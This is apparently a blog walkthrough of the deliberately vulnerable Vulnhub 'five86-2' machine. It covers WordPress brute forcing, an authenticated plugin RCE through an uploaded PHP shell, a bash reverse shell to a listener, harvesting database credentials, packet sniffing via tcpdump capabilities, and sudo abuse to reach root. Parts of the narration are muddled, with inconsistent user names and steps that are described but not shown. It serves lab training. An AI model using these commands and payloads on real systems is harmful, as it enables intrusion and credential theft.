Vulnhub is a site that hosts vulnerable machines to help security practictioners hone their offensive security skills. This is the five86 2 Vulnhub walkthrough. It is a hard box and I highly recommend doing it, however if you have not yet done the first one do it now beforehand.
Table of Contents
What is an OSCP-like box?
An OSCP-like box is one you might see on the Offensive Security OSCP exam. It is one that is more realistic in its intended exploitation than other boxes that rely on less practical exploit methodologies such as steganography, cracking complex hash sequences, etc. In a nutshell, it means that the box is something you could expect to see in use in real life. You won’t find mind puzzles and abstract sudoku-like challenges in these boxes. Personally I find those to be annoying and prefer OSCP-like boxes in general.
These are the OSCP-related skills you will improve upon by completing this challenge.
- Linux Privilege Escalation
- Hacking Web Apps
- Enumerating WordPress
- URL-Encoding Payloads
- Locating Plaintext Credentials On the Target
- Unprivileged Linux Process Snooping
Here’s What You Need
- Kali Linux VM – VirtualBox
- Five86-2 VM – VirtualBox
- Both machines on the same network.
Recon
Start with an nmap scan. It looks like there are a few ports open which are TCP 20, 21, and 80.
Upgrade your scan to an AutoRecon scan to get the best results.
nmap -sV -p- 10.0.50.73
wpscan --api-token $YOURKEY --url http://five86-2 -e --plugins-detection aggressive
wpscan --api-token $YOURKEY --url http://five86-2 -P /usr/share/wordlists/rockyou.txt Web Enumeration
So this is the step where other tutorials fall off and leave you hanging. There are some details here that you can easily overlook.
Look at the bottom of the page there is a hyperlink for five86-2 what does that mean for next steps?
If you click on the hyperlink it will take you to http://five86-2 in your browser, but it completes as a blank page. In order to progress here you need to add an entry to your /etc/hosts file. Do so by issuing an echo “10.0.0.9 five86-2” >> /etc/hosts file and now try accessing the same URL address. So we find out that the page is a WordPress site which means the next step is to do WordPress enumeration to look for an exploit we can use.
wpscan --url http://10.0.0.9/ --enumerate p,u --plugins-detection aggressiveUsing wpscan bruteforce the available users on the site and by using the plugin identifier function to look for vulnerable plugins being installed.
Now that we have users we can use wpscan to bruteforce authentication to the wp-admin page by passing it a list of usernames and passwords to try. The password brute forcing returns two sets of credentials. These are stepen:apollo1 and barney:spooky1.
How to Exploit WordPress Plugin
Enumerating the WordPress site reveals a vulnerable plugin is installed Title: Insert or Embed Articulate Content into WordPress <= 4.2998 – Authenticated RCE this could be how we get our first shell on the target. Once logged in as the exploit is found on exploitdb.
I finally got a shell back to my netcat listener by creating a multi-lined PHP shell. The exploit for the vulnerable plugin https://www.exploit-db.com/exploits/46981 says to use a PHP shell and upload it to the target by creating a new post, adding a new block e-Learning, and uploading the attachment as the zip file we created in a local directory. Once this is done we can access the files by going to the uploads directory and loading them.
The important take away here is that this is the first exploit we have on the target and now we have remote PHP execution!
# stage 1
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.html
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=whoami
# stage 2
bash -c 'bash -i >& /dev/tcp/10.0.50.50/1234 0>&1'
http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php?cmd=%62%61%7...To exploit the vulnerable plugin follow the instructions I just laid out and proceed by creating a new post, create a new block selecting the e-learning module, upload our shell.zip file and then publish the post.
Next to execute the PHP shell visit the URL of the new post it will be http://five86-2/wp-content/uploads/articulate_uploads/shell/shell.php and will execute simply by entering that link in your browser.
Before doing so remember to start a netcat listener to listen on 1234.
A Note On URL Encoding
In scenario such as this where URL-encoding a payload is required, there are several options. However, I find that using Burp Suite is the easiest and most reliable.
Privilege Escalation
First you need to upgrade your shell, it makes life easier. You also won’t be able to execute commands as you would be able to in a fully interactive shell. Our new user stephen can’t run any commands with sudo so let’s follow the usual enumeration steps and see what groups he is in. The one that stands out is named pcap, why the heck is he in that group?
Now that we have a sehll on the target it is time to gear up for the next phase, privilege escalation. The first thing we need to do is upgrade the pseudo shell we currently have to a better one. I have outlined the commands below, these are reliable I find whereas others’ instructions usually work sometimes only.
It turns out that there are configuration files with plaintext credentials in them, if we just do a bit of digging. The wp-config file has a username and password for the database that is running locally. Do you remember seeing a database port open on the target during the initial enumeration? Yea me neither.
The interface we want to observer is 6: veth99decf4 which means eth6. I got this by doing an ip a command since ifconfig is not installed. That would too easy eh? First you have to move to a writable folder location I moved to /var/tmp and that worked.
# upgrade pseudo shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty -echo
cat wp-config.php
# abuse the database for new credentials
mysql -u dbuser -h localhost -p
show databases;
use wordpressdb;
select * from wp_users
select user_login, user_pass from wp_users;Cracking Credentials Hashes
Collecting password hashes and usernames from the database means we can now attempt to crack the hashes. Once we have the passwords in plaintext we can attempt to use them to login to different services on the target. Sometimes it is wise to use captured usernames and passwords interchangeably, you never know which combination will lead to access.
john hash --w=/usr/share/wordlists/rockyou.txt
su stephen
getcap -r / 2>/dev/nullProcess Snooping And Getcap Abuse
Another common Linux privilege escalation technique is unprivileged Linux process snooping using pspy. Using Pspy shows that there is an FTP server running on a specific port ftp -n 172.18.0.10 , this is important because in order to dump packets we need to target the network interface for this ip address.
One common Linux privilege escalation technique is getcap -r / 2>/dev/null where the output can show vulnerable privileges given to users that can be exploited. Stephen has the permissions /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip if you Google how to use this it shows that this privilege means we can dump packets without being the root user.
Use that command to read the new pcap file. Once it is up look through the pcap for credentials.
It looks like there is one set of credentials being passed in cleartext these are paul:esomepasswford. Paul is not part of any interesting user groups like stephen is. This time look at what commands paul can run with sudo privileges.
Paul can run the /usr/sbin/service binary as peter with no password required, nice!
What does that mean exactly? It means the admin for this box set the ability for the user paul to run the /usr/sbin/service binary as the user peter. Looking at peter now he is able to run the /usr/bin/passwd binary without a password with sudo privileges. To exploit the passwd binary for privilege escalation simply change the password for any user, maybe root’s password?
Root privilege is gained by exploiting the passwd binary to change the root admin’s password to ‘pwned’. Paul can run the /usr/sbin/service as the root user without requiring the root password. This means we can spawn a new Bash shell as root and escalate to the final user.
There is the captured flag and its contents on display, we did it!